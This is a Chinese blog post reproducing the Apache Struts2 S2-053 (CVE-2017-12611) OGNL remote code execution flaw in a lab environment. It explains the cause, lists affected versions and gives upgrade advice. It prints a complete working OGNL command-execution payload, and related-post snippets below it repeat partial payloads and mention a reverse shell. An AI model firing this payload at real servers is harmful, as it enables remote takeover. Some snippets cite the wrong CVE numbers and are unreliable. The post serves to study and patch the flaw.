S2-053 远程代码执行漏洞检测与利用

最新推荐文章于 2025-06-12 15:09:26 发布
最新推荐文章于 2025-06-12 15:09:26 发布
阅读量2.8k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞利用 文章标签: S2-053 代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_29647709/article/details/84955205
Struts2的S2-053漏洞(CVE-2017-12611)允许远程代码执行,源于Freemarker模板引擎与OGNL表达式的不当交互。该文解释了漏洞原理,提供了检测和利用示例,并给出了修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。

漏洞记录

漏洞编号:S2-053(CVE-2017-12611)

漏洞影响:远程代码执行

影响版本:Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10

漏洞修复:升级至最新版本

漏洞检测利用

访问http://192.168.1.15:8080/hello.action即可看到一个提交页面。
输入如下Payload即可成功执行命令:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

在这里插入图片描述

解决方案

1、升级到Apache Struts版本最新版本

2、使用只读属性来初始化value属性(仅限getter属性)

3、Freemarker标签内容不要通过Request方式获取

参考链接:
https://github.com/vulhub/vulhub/blob/master/struts2/s2-053/
在这里插入图片描述

本地复现Struts2-053漏洞
dmra71403的博客
05-14 761
漏洞环境:http://192.168.253.131/ exp: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.Actio...
S2-053 远程代码执行漏洞
不想当脚本小子的脚本小子
02-04 178
有道云笔记链接:http://note.youdao.com/noteshare?id=a2516832fa83203bd5ebd7aa82f15343&sub=3F86F69D289C4DB7BE21E20F2494D4BE
Apache Struts2安全验证及S2-053漏洞防护指南
最新发布
weixin_42509720的博客
06-12 1096
Apache Struts2是一种流行的Web应用程序框架,它基于MVC(Model-View-Controller)模式构建,帮助开发者构建动态网站和应用程序。作为一个开源项目,Struts2拥有广泛的社区支持和丰富的文档资源,使得开发者可以更加专注于业务逻辑的实现,而非基础架构。S2-053(CVE-2017-9805)是一个影响Apache Struts2框架的远程代码执行漏洞。该漏洞存在于Struts 2.3.x至2.3.34和2.5.x至2.5.16版本中。
S2-053远程代码执行漏洞
Snowflake1997的博客
03-18 389
首先进入漏洞环境 构造所需漏洞 docker-compose up -d 在浏览器中登录 http://your-ip:8080/hello.action %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognl
【S2-053漏洞复现
2201_75873133的博客
03-13 338
然后再框中重新输入(注意换成自己ip)然后Linux成功反弹shell。1.在输入框中写入以下内容。将id换成自己的IP。
【Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
温氏效应
09-04 4129
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
攻击者可以通过提交恶意的、可反序列化的对象,触发远程代码执行(RCE)。 接下来是s2-016漏洞(CVE-2016-1000031),这是2016年发现的一个高危漏洞,也OGNL有关。此漏洞在于Struts2的...
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)漏洞复现
sechelper的博客
01-11 944
cve漏洞详细复现,漏洞利用,反弹shell,工具分享
漏洞复现】---- S2-001远程代码执行漏洞
qq_43168364的博客
09-08 471
一、简介 该漏洞是因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式 (Struts框架使用OGNL作为默认的表达式语言,作用是对数据进行访问) %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败,后端一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行。 我们来了解以下Struts2中的validation机制。validation依靠valida
struts漏洞检测工具
11-08
struts2 漏洞检测工具 ,快速检测struts命令执行漏洞,可批量。运行环境要求:MAC/Linux下的Python2、Python3 。支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037,ST2-045,ST2-046,ST2-048,ST2-052,ST2-053,ST2-057的漏洞检测
Struts2远程命令执行验证工具
11-22
Struts2漏洞检查工具,可快速检测struts命令执行漏洞,支持批量导入验证,存在利用漏洞后,可远程执行命令及文件上传等操作。方便管理人员了解其危害。
[旧文系列] Struts2历史高危漏洞系列-part5:S2-052/S2-053/S2-057
mole_exp的博客
01-18 929
文章目录关于<旧文系列>前言S2-052漏洞复现分析可回显PoC漏洞修复S2-053漏洞复现分析可回显PoC漏洞修复S2-057漏洞复现分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
S2-045之不能再当脚本小子之格物致知之知行合一
shy的博客
03-05 542
发现奇怪告警 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Type: {\u0028\u0023\u006e\u0069\u006b\u0065\u003d\u0027multipart/form-data\u0027\u0029\u002e\u0028\u0023\u0064\u006d\u003d\u0040\u006f\u0067\u006e\u006c\u002e\u004f\u0067\u006e\u
java struts2 漏洞复现合集
whatday的专栏
08-31 8241
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611)
qq_51577576的博客
12-12 840
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611) Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞
【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
Unitue_逆流
10-13 8361
实验环境 操作机:Windows 7IP:172.16.11.2 实验工具XAMPP: 一个功能强大的建站集成软件包 可以实现服务器的功能,但是只能自己访问 Firefox: 中文俗称‘火狐’,一个自由及开放源代码网页浏览器漏洞介绍继S2-052之后,Apache Struts 2再次被曝存在远程代码执行漏洞漏洞编号S2-053,CVE编号CVE-2017-1000112。当开发人员在Fr
S2-016漏洞利用工具的检测应用
S2-016是一个特定于Apache Struts2框架的远程代码执行漏洞。Apache Struts2是一个流行的开源Web应用框架,用于构建Java EE应用程序。该框架因其高性能、可扩展性以及多种功能支持而被广泛应用。S2-016漏洞存在于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值